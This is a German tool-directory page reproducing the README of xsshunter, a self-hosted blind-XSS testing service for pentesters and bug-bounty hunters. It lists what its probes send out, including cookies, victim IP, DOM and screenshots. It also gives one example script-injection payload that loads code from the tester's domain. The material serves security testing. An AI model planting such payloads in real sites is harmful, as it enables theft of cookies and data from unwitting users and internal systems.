Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
xsshunter — Der XSS Hunter Dienst - eine tragbare Version von XSSHunter.com | Kitploit
Tools/GitHubGitHub/mandatoryprogrammer/xsshunter
SchwachstellenanalyseExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubmandatoryprogrammer/xsshunter

xsshunter

Der XSS Hunter Dienst - eine tragbare Version von XSSHunter.com

Repository anzeigen
1.6k303vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

VERALTET - PROBIERE DIE NEUE EXPRESS-VERSION

Mehr Informationen hier: https://github.com/mandatoryprogrammer/xsshunter-express

XSS Hunter Quellcode

Dies ist eine portable Version des Quellcodes, der auf https://xsshunter.com läuft. Es ist so konzipiert, dass es einfach auf jedem Server installiert werden kann, für Sicherheitsexperten und Bug-Bounty-Jäger, die XSS auf eine viel leistungsfähigere Weise testen möchten.

Wenn Sie diese Software nicht einrichten möchten und lieber einfach mit dem Testen beginnen möchten, besuchen Sie https://xsshunter.com .

Voraussetzungen

  • Ein Server, der (vorzugsweise) Ubuntu ausführt.
  • Ein Mailgun-Konto zum Versenden von XSS-Payload-Fire-E-Mails.
  • Ein Domainname, vorzugsweise etwas Kurzes, um die Payload-Größen gering zu halten. Hier ist eine gute Website zum Finden von zweistelligen Domainnamen: https://catechgory.com/. Meine Domain ist zum Beispiel xss.ht.
  • Ein Wildcard-SSL-Zertifikat, hier gibt es ein günstiges. Dies ist erforderlich, da XSS Hunter Benutzer anhand ihrer Subdomains identifiziert und alle SSL-fähig sein müssen. Wir können Let's Encrypt nicht verwenden, da sie keine Wildcard-Zertifikate unterstützen. Ich werde davon absehen, das Geschäftsmodell der Zertifizierungsstellen zu beleidigen, aber seien Sie versichert, es ist sehr albern und kostet sie sehr wenig, Ihnen ein Wildcard-Zertifikat auszustellen. Gehen Sie also zum günstigsten Anbieter, den Sie finden können (solange er in allen Browsern unterstützt wird).

Einrichtung

Bitte besuchen Sie https://thehackerblog.com/xss-hunter-is-now-open-source-heres-how-to-set-it-up/ für Informationen zur Einrichtung von XSS Hunter auf Ihrem eigenen Server.

Zusammenfassung der Funktionalität

Nach der Registrierung erstellen Sie eine spezielle kurze Domain wie yoursubdomain.xss.ht, die Ihre XSS-Schwachstellen identifiziert und Ihren Payload hostet. Dann verwenden Sie diese Subdomain in Ihren XSS-Tests mit Injektionsversuchen wie "><script src=//yoursubdomain.xss.ht></script>. XSS Hunter stellt automatisch XSS-Sonden bereit und sammelt die resultierenden Informationen, wenn sie ausgelöst werden.

Funktionen

  • Verwaltete XSS-Payload-Fires: Verwalten Sie alle Ihre XSS-Payloads im Kontrollpanel Ihres XSS Hunter-Kontos.
  • Leistungsstarke XSS-Sonden: Die folgenden Informationen werden jedes Mal gesammelt, wenn eine Sonde auf einer verwundbaren Seite ausgelöst wird:
    • Die URI der verwundbaren Seite
    • Ausführungsursprung (Origin of Execution)
    • Die IP-Adresse des Opfers
    • Der Referer der Seite
    • Der User-Agent des Opfers
    • Alle Nicht-HTTP-Only-Cookies
    • Das vollständige HTML-DOM der Seite
    • Vollständiger Screenshot der betroffenen Seite
    • Verantwortlicher HTTP-Request (falls ein XSS Hunter-kompatibles Tool verwendet wird)
  • Ganzseitige Screenshots: XSS Hunter-Sonden nutzen die HTML5-Canvas-API, um einen vollständigen Screenshot der verwundbaren Seite zu erstellen, auf der ein XSS-Payload ausgelöst wurde. Mit dieser Funktion können Sie einen Blick in interne Administrationspanels, Helpdesks, Protokollierungssysteme und andere interne Webanwendungen werfen. Dies ermöglicht aussagekräftigere Berichte, die die volle Auswirkung der Schwachstelle für Ihren Kunden oder Ihr Bug-Bounty-Programm zeigen.
  • Markup-Berichtserstellung: Jeder XSS-Payload-Bericht enthält einen vorab generierten Markdown-Bericht. Diese generierten Berichte sind auch mit anderen Markdown-unterstützenden Plattformen wie Phabricator kompatibel, um eine einfache Fehlerberichterstattung in firmeneigenen Ticketsystemen zu ermöglichen.
  • XSS-Payload-Fire-E-Mail-Berichte: XSS-Payload-Fires senden auch detaillierte E-Mail-Berichte, die leicht an die entsprechenden Sicherheitskontakte weitergeleitet werden können, um eine einfache Meldung kritischer Fehler zu ermöglichen.
  • Automatische Payload-Generierung: XSS Hunter generiert automatisch XSS-Payloads, die Sie in Ihren Webanwendungssicherheitstests verwenden können.
  • Korrelierte Injektionen: Vielleicht die leistungsstärkste Funktion von XSS Hunter ist die Fähigkeit, Injektionsversuche mit XSS-Payload-Fires zu korrelieren. Durch die Verwendung eines XSS Hunter-kompatiblen Testtools können Sie sofort wissen, was einen bestimmten Payload ausgelöst hat (sogar Wochen nach dem Injektionsversuch!).
  • Optionale PGP-Verschlüsselung für Payload-E-Mails: Besonders paranoid? Clientseitige PGP-Verschlüsselung ist verfügbar, die alle Injektionsdaten im Browser des Opfers verschlüsselt, bevor sie an den XSS Hunter-Dienst gesendet werden.
  • Seitengrabbing: Nach dem Auslösen Ihres XSS-Payloads können Sie eine Liste relativer Pfade angeben, die der Payload automatisch abrufen und speichern soll. Dies ist nützlich, um andere Schwachstellen wie schlechte crossdomain.xml-Richtlinien in internen Systemen zu finden, auf die normalerweise nicht zugegriffen werden kann.
  • Sekundäres Payload-Laden: Haben Sie einen sekundären Payload, den Sie laden möchten, nachdem XSS Hunter seine Arbeit erledigt hat? XSS Hunter bietet Ihnen die Möglichkeit, einen sekundären JavaScript-Payload anzugeben, der nach Abschluss der Sammlung ausgeführt werden soll.
  • iOS-Webanwendung: Es ist auch möglich, Ihre XSS-Payload-Fires über eine iOS-Web-App anzuzeigen. Navigieren Sie einfach zum Pfad /app und speichern Sie die Seite als Webanwendung auf dem Desktop Ihres iPhones.

Bemerkenswerte Exploits

  • Blindes XSS in Teslas internem Wartungstool: https://samcurry.net/cracking-my-windshield-and-earning-10000-on-the-tesla-bug-bounty-program/
  • Blindes XSS in Spotifys Salesforce-Integration: https://mhmdiaa.github.io/blind-xss-in-spotify/
  • Blindes XSS in GoDaddys Support-Panel: https://thehackerblog.com/poisoning-the-well-compromising-godaddy-customer-support-with-blind-xss/

Möchten Sie beitragen?

Der gesamte Code wurde von mir erstellt und ist (aus diesem Grund) wahrscheinlich nicht Best Practice und definitiv optimierungs-/aufräumbedürftig. Jegliche Pull-Requests werden geschätzt!

Tool herunterladen